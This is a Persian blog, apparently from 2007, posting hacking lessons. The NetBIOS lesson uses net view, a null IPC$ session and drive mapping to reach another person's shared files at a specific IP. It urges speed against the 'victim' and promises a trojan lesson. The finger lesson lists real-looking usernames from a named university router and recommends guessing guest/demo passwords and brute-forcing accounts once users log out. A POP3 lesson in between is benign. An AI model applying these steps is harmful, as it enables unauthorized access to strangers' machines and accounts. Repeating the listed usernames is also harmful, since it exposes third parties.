    HOME-TU6U0AV86Y<20> UNIQUE Registered

    MSHOME <1E> GROUP Registered



    MAC Address = 00-53-45-00-00-00


    ۳- در این نتایج چیزی که به درد می‌خوره، سطری است که <20> دارد. اگه <20> نباشد، یعنی نمی‌تونین از اشتراک گذاری فایل استفاده کنید ( به عبارت ساده تر بی‌خیال شو این کامپیوتر رو ! ). در این مثال ما این سطر را داشتیم پس ادامه می‌دهیم. حالا می‌نویسم:

    net view \\217.218.84.29

    حالا اگه گفتین چی میشه؟ درسته! دو حالت ممکنه اتفاق بیوفته:
    الف) پیغام بیاد

    System error 5 has occurred.



    Access is denied.

    این یعنی نمی‌تونین ادامه بدین. به عبارت دیگه ایست! ولی یه کاری می‌تونید بکنید و اون اینه که یه null session برقرار کنید با اون کامپیوتر. این حالت در مورد ویندوز‌های سری NT جواب میده. می‌نویسید:

    net use \\217.218.84.29\IPC$ "" /user:""

    حالا چرا می‌گن null session ؟ دلیلش اینه که یک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه این دستور جواب داد می‌تونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.
    ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:

    Shared resources at \\217.218.84.29



    Share name Type Used as Comment



    ------------------------------------------------

    Printer Print Acrobat PDFWriter

    Printer2 Print Acrobat Distiller

    SharedDocs Disk

    The command completed successfully.

    عالیه. دقت کنید که در این کامپیوتر یک فایل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تای باقی برای پرینتر است). حالا که رسیدم به این اسم دیگه آخرین دستور را می‌نویسم.

    ۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بدیم. برای اینکار باید یک درایو انتخاب کنید. حتما می‌دونید که درایو چیه. وقتی شما My Computer را دابل کلیک کرده و باز می‌کنید، یک سری آیکون می‌بینید که هر کدام اسمی‌ دارند. مثلا :A برای فلاپی و و و تا می‌رسید به cdrom که آخرین حرف را دارد. مثلا فرض کنید که :K باشه. حالا باید اسم درایو رو برای اشتراک گذاشتن انتخاب کنید. برای این‌کار حرف بعدی در زبان انگلیسی رو به کار ببرید. چون در کامپیوتر من :K آخرین بود، من حرف بعدی یعنی :L را انتخاب می‌کنم و دستور زیر را می‌نویسم:

    net use L: \\217.218.84.29\SharedDocs

    به اسم درایو، ip و نام مربوطه که ShareDocs دقت کنید. چون من اصطلاحا به صورت null session دارم ارتباط می‌گیرم، ممکنه کار نکنه ولی اگه درست کار کنه جواب می‌شنوم:

    The command completed successfully.

    معرکه است!!! حالا My Computer رو باز کنید و ببینید که درایو جدید به لیست درایوها اضافه شده که می‌تونین مثل درایوهای معمولی با اون کار کنید و فایل کپی کنید و ...

    ۵- وقتی کار تموم شد می‌تونید درایو رو حذف کنید. برای اینکار می‌تونین روی درایو رایت‌کلیک کنید و Disconnect را انتخاب کنید. و یا اینکه از دستور

    net use /delete L:

    استفاده کنید.


    ◊ نکته نکته نکته


    ۱- یه روش جالب به جای مرحله ۴ در بالا اینه که مثلا در مرورگر یا در run بنویسید 217.218.84.29\\ که ip دارای اشتراک است و یا اینکه تایپ کنید SharedDocsت\217.218.84.29\\ که اصولا باید جواب بده ( ولی من خودم تست نکردم اینو ).
    ۲- من دارم به صورت استاندارد کار می‌کنم. بعدا خواهم گفت که چطوری می‌تونیم وقتی تو بعضی از مراحل متوقف می‌شیم، اونو دور بزنیم.
    ۳- NetBIOS فقط برای کلاینت‌ها نیست. من خودم یکبار سایت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
    ۴- اگه دارید یک کلاینت رو هک می‌کنید، باید سریع عمل کنید تا قبل از اینکه طرف disconnect کنه کار شما تموم شده باشه.
    ۵- روش‌های دیگری هم برای کار با NetBIOS هست که یکی از اون روش‌ها استفاده از یک سری نرم‌افزارهای خاص است که تو درس بعدی توضیح می‌دم و نیز یک روش دیگه اعمال تغییرات در فایل‌های HOST و LMHOST و استفاده از find در سیستم‌عامل ویندوز است. ولی چون این روش دنگ و فنگش زیاده، جالب نیست.
    ۶- برای اینکه بتونیم با NetBIOS کار کنیم، علاوه بر اینکه در کامپیوتر طرف مقابل باید فعال باشه، روی کامپیوتر خودمون هم فعال باشه. چون در حالت پیش‌فرض در کامپیوتر فعال است، معمولا مشکلی نیست.


    ◊ درس بعدی


    درس بعدی هم در مورد همین NetBIOS است:
    ۱- چگونه از این امکان share یا به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم.
    ۲- چگونه NetBIOS را فعال و غیر فعال کنیم.
    ۳- از چه ابزارهای دیگه‌ای می‌تونیم استفاده کنیم.

    کوچیک ::: یکشنبه 86/7/22::: ساعت 3:0 صبح
    نظرات دیگران: نظر

    - خلاصه درس: در این درس با پورت ۱۱۰ (POP3) آشنا می‌شویم.

    ◊ خلاصه پروتکل‌های مرتبط با E-mail

    ۱- SMTP :
    قبلا با این پورت آشنا شدیم که روی پورت ۲۵ اجرا می‌شد. ما از این پروتکل برای ارسال E-mail استفاده کردیم. این پروتکل امروزه دیگه برای خوندن E-mail استفاده نمی‌شه.

    ۲- POP3 :
    بحث امروز ماست. این پروتکل را روی پورت ۱۱۰ بحث می‌کنیم و از آن برای خواندن E-mail های رسیده استفاده می‌کنیم.

    ۳- IMAP :
    این پروتکل به عنوان جایگزینی برای پروتکل POP3 به‌کار میره. از نظر ساختاری کمی با پروتکل POP3 متفاوت است ولی کارش همان است و برای خواندن E-mail های رسیده به کار می‌رود.

    + Web-based Email: یک روش دیگه برای دسترسی به E-mail وجود دارد و آن استفاده از امکانات وب برای خواندن و فرستادن E-mail است. وقتی شما از خود سایت yahoo یا hotmail برای کار با E-mail استفاده می‌کنید، در واقع همین روش را به کار می‌برید. نکته قابل توجه آن است که این روش کند‌تر از استفاده مستقیم از پروتکل‌هاست.


    ◊ پورت ۱۱۰ چیست؟


    پورت ۱۱۰ برای پروتکل POP3 استفاده می‌شود. عبارت POP3 مخفف Post Office Protocol Version 3 است که این پروتکل برای خواندن E-mail استفاده می‌شود. برای کار با این پروتکل باید آدرس POP Server مربوط به E-mail خود را بدانید. برای این‌کار می‌توان از nslookup استفاده کرد و سطری که عبارت MX دارد را خواند (قبلا چگونگی کار را گفتم و الان دیگه توضیح نمی‌دم). دقت کنید که در مورد سایت‌های کوچک، آدرس POP Server همان آدرس SMTP Server است ولی در سایت‌های بزرگ (مثل یاهو‌ ) سرور‌های مربوطه جداست ( یعنی دو اسم مختلف دارد ). در مورد سایت یاهو POP Server در آدرس pop.mail.yahoo.com قرار دارد. ( من جدیدا این سرور رو تست نکردم، خودتون تست کنید و مطمئن بشید ). من امروز می‌خوام از E-mail های سایت noavar.com استفاده کنم که هم خیلی عالیه و هم ایرانیه! POP Server این سایت در آدرس mail.noavar.com قرار دارد.


    ◊ با پورت ۱۱۰ صحبت کنیم


    فرض کنید که من در سرور mail.noavar.com یک اکانت به اسم araztest و پسورد mypass دارم. (شما هم اگه می‌خواهید تست کنید، یک اکانت برای خودتون در این سایت باز کنید). حالا می‌خوام با پورت ۱۱۰ صحبت کنم، بنابراین از یکی از دو دستور زیر استفاده می‌کنم:

    telnet mail.noavar.com 110

    nc -v mail.noavar.com 110

    و جواب می‌شنوم:

    +OK POP3 server www.noavar.com ready

    دقت کنید که اگه از تلنت استفاده کنید،چیزهایی که شما تایپ می‌کنید، دیده نمی‌شود و نمی‌تونید از دکمه ‌Backspace‌ استفاده کنید. حالا می‌خوام بگم که اسم اکانت من araztest است، پس می‌نویسم:

    user araztest

    و جواب می‌شنوم:

    +OK Please enter password for araztest

    حالا می‌خوام پسوردم رو بگم که اجازه صادر بشه! می‌نویسم:

    pass mypass

    و جواب می‌شنوم:

    +OK password for user araztest Accepted

    حالا می‌خوام بدونم که جمعا چندتا mail رسیده است و حجم کل چقدر است. می‌نویسم:

    stat

    و جواب می‌شنوم:

    +OK 2 25924

    یعنی برای من ۲ تا پیغام رسیده و حجم کل پیام‌های رسیده، ۲۵۹۲۴ بایت است. حالا می‌خوام لیست پیام‌ها رو داشته باشم، می‌نویسم:

    list

    و جواب می‌شنوم:

    +OK

    1 70

    2 24923

    .

    این یعنی پیغام شماره یک (پیغام جدیدتر) حجم ۷۰ بایت دارد و پیغام شماره دو حجم ۲۴۹۲۳ بایت دارد. حالا می‌خوام پیغام شماره ۱ را بخونم. می‌نویسم:

    retr 1

    و جواب می‌شنوم:

    +OK 70 octets

    Message-ID: <875808060@www.noavar.com>

    From: "ali"

    X-Mailer: Noavar

    To: araztest@noavar.com

    MIME-Version: 1.0

    Subject: salam

    Date: Thu, 13 Feb 2003 20:05:56



    salam, chetori?

    .

    حالا می‌خواهم این پیغام ( شماره یک ) رو پاک کنم، می‌نویسم:

    dele 1

    و جواب می‌شنوم:

    +OK Message 1 Marked for removal

    [ دقت کنید که این پیغام هنوز پاک نشده است و فقط علامت خورده که موقع خروج، پاک بشه. حالا ممکنه چندتا پیغام را مارک کنید که حذف بشه ولی بعد بی‌خیال! می‌شین. برای اینکه این علامت‌ها را حذف کنید که موقع خروج دیگه پاک نشوند، می‌تونید بنویسید:

    rset

    و جواب می‌شنوم:

    +OK 1 70

    ]
    حالا اگه بخواهم خارج بشم (و علامت‌خورده‌ها پاک بشن)، می‌‌نویسم:

    quit

    و جواب می‌شنوم:

    +OK www.noavar.com signing off

    والسلام ...

    کوچیک ::: شنبه 86/7/21::: ساعت 3:0 صبح
    نظرات دیگران: نظر

    - خلاصه درس: در این درس با پورت ۷۹ (finger) آشنا می‌شویم.

    ◊ پورت ۷۹ چیست؟

    پورت ۷۹ را پورت finger می‌گویند. کاربرد این پورت به اوایل ایجاد اینترنت بر‌می‌گرده و کاربردش مخصوص سیستم‌عامل یونیکس بوده‌است (الان هم تقریبا فقط در خانواده سیستم‌های یونیکس این پورت قابل استفاده است).
    وقتی این پورت روی سیستم‌عامل یونیکس باز باشه، می‌شه با یک request ساده فهمید که از بین کسانی که در آن سیستم account دارند، کدام‌ها on هستند (یعنی کدام‌ها به سیستم login شده‌اند). برنامه‌ای که پورت ۷۹ رو در یک سیستم باز می‌کنه، finger server می‌گن و چون مختص سیستم‌عامل یونیکس است، می‌تونین از عبارت Finger Deamon استفاده کنین. حالا که پورت ۷۹ روی سیستم باز شد، شما می‌تونین با اون ارتباط برقرار کنین.

    ◊ با پورت ۷۹ صحبت کنیم

    همان‌طور که می‌دانید، برای صحبت کردن با پورت‌ها از دو برنامه telnet و nc میشه استفاده کرد. در مورد پورت ۷۹ یه نرم‌افزار دیگر به نام finger در تمام سیستم‌عامل‌های یونیکس و برخی سیستم‌عامل‌های ویندوز وجود دارد که علاوه بر دو برنامه قبلی، اونم می‌شه به کار برد.
    فرض کنید که می‌خوام با پورت ۷۹ در کامپیوتری به اسم router2.iums.ac.ir ارتباط برقرا کنم. برای این‌ کار یکی از سه دستور زیر را استفاده می‌کنم:

    telnet router2.iums.ac.ir 79

    nc -v router2.iums.ac.ir 79

    finger .@router2.iums.ac.ir

    دقت کنید که در دو دستور اول شماره پورت مشخص شده ولی دستور آخری نه، چون دستور finger فقط برای همین‌کار استفاده می‌شه و نمی‌توان باهاش با پورت دیگه‌ای ارتباط برقرار کرد. ضمنا به ساختار دستور آخر توجه کنید. بعد از اجرای دستور، جواب می‌شنوم:

    Line User Host(s) Idle Location

    33 tty 33 whgh Async interface 0

    34 tty 34 najahan Async interface 0

    35 tty 35 sadf Async interface 0

    36 tty 36 abokho Async interface 0

    38 tty 38 whgh Async interface 0

    39 tty 39 bzamani Async interface 0

    40 tty 40 saeedmah Async interface 0

    41 tty 41 mfaizi Async interface 0

    42 tty 42 gourabi Async interface 0

    43 tty 43 farhadz Async interface 0

    44 tty 44 arbks Async interface 0

    45 tty 45 mhalavi Async interface 0

    46 tty 46 farhood Async interface 0

    47 tty 47 staavoni Async interface 0

    48 tty 48 whgh Async interface 0

    * 66 vty 0 idle 0 217.218.84.58



    Interface User Mode Idle Peer Address

    نکته مهم این است که اطلاعاتی که به کمک پورت ۷۹ به دست می‌آد، خیلی بستگی به سروری داره که این اطلاعات رو می‌فرسته. بعضی از سیستم‌ها علاوه بر نام افراد (username) که در این مثال دیده می‌شه، نام و نام خانوادگی افراد، ساعت و محل login کردن و ... را نمایش می‌دهند. اما چیزی که همیشه وجود دارد و مشترک است، username هاست که از نقطه نظر یک هکر بسیار ارزشمند است. در این مثال ما اکانت‌هایی به اسم najahan ،whgh و ... در این سرور وجود دارد و افراد مربوطه در حال حاضر login کرده‌اند. اگر اکانتی موجود باشد ولی فرد مورد نظر در حال حاضر از آن اکانت وارد نشده باشد، نمایش داده نمی‌شود. این لیست فقط برای اکانت‌های فعال است. پس نتایجی که شما در ارتباط با این سرور کسب می‌کنید، با نتایجی که من نوشتم متفاوت خواهد بود.

    ◊ این اطلاعات به چه دردی می‌خورد؟

    اول اینو بگم که finger کردن، جزئی از مراحل Enumeration است (البته در حالت کاربرد legal یا قانونی). منظور از عبارت Enumeration یا به طور خلاصه Enum، پیدا کردن لیست کاربران است.
    + فرض کنید می‌خواهید یک لیست از پسورد‌ها را تست کنید تا اینکه یکی شانسی درست در بیاد (درست مثل دزدها که یه سری کلید را تست می‌کنن که یکی به قفل بخوره و باز کنه!) حالا سوال اینه که این پسورد‌ها رو برای چه username ی تست می‌کنید؟ جواب، username هایی است که با Enumeration به دست اومده است. پس اول با Enumeration یه لیست پیدا می‌کنید و بعد تعداد زیادی پسورد رو روش تست می‌کنید (روش این کارو بعدا می‌گم).
    + کاربرد بعدی finger در رابطه با یک سری اکانت‌های خاص است. من همیشه وقتی به یک اکانت به اسم guest برخورد می‌کنم، همیشه پسوردهای guest یا libguest یا myguest و ... رو تست می‌کنم که گاهی جواب میده. همین‌طور در مورد اکانتی به اسم demo پسورد demo را تست می‌کنم و ... معمولا موسسات بزرگ پر است از این username های عمومی که حدس زدن پسورد مربوطه کار مشکلی نیست.
    + گفتم که بعضی سرورهای finger نام و نام‌خانوادگی افراد را هم برایمان می‌فرستند. چون بعضی از افراد متاسفانه یا خوشبختانه از این اطلاعات برای پسوردشون استفاده می‌کنند، می‌تونه مفید باشه.
    + یک کاربرد دیگه و البته بسیار مهم موقعی است که مثلا می‌خواهید یک سری پسورد رو روی یک اکانت خاص تست کنید. من همیشه اول یک finger می‌کنم که مطمئن بشم که فرد در حال حاضر login نکرده باشد و بعد این کار رو شروع می‌کنم ( یعنی انقدر صبر می‌کنم که دیگه آن اسم خاص در finger نمایش داده نشه یعنی طرف مقابل logout کرده باشد!)
    + بازم یه کاربرد‌های مهم دیگه هست که الان بهتون نمی‌گم تا تو خماریش بمونین ! شوخی کردم، وقتی بحث پورت‌ها تموم شد و رسیدیم به کاربرد‌های غیر معمول این پورت‌ها، براتون حتما می‌گم.

    کوچیک ::: جمعه 86/7/20::: ساعت 3:0 صبح
    نظرات دیگران: نظر

    <      1   2   3   4   5   >>   >
    لیست کل یادداشت های این وبلاگ

    >> بازدیدهای وبلاگ <<
    بازدید امروز: 6
    بازدید دیروز: 18
    کل بازدید :31849

    >>اوقات شرعی <<

    >> درباره خودم <<

    >>لوگوی وبلاگ من<<
    پاییز 1386 - آرشیو مقالات کامپیوتری

    >>آرشیو شده ها<<

    >>جستجو در وبلاگ<<
    جستجو:

    >>اشتراک در خبرنامه<<
     

    >>تبلیغات<<